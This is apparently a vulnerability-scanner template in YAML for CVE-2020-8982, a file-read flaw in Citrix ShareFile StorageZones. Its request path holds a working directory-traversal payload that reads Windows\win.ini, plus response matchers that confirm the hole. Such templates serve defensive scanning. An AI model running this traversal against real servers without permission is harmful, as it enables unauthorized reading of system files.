27 lines
837 B
YAML
27 lines
837 B
YAML
id: CVE-2020-8982
|
|
|
|
info:
|
|
name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
|
|
tags: cve,cve2020,citrix,lfi
|
|
reference: https://support.citrix.com/article/CTX269106
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
part: body
|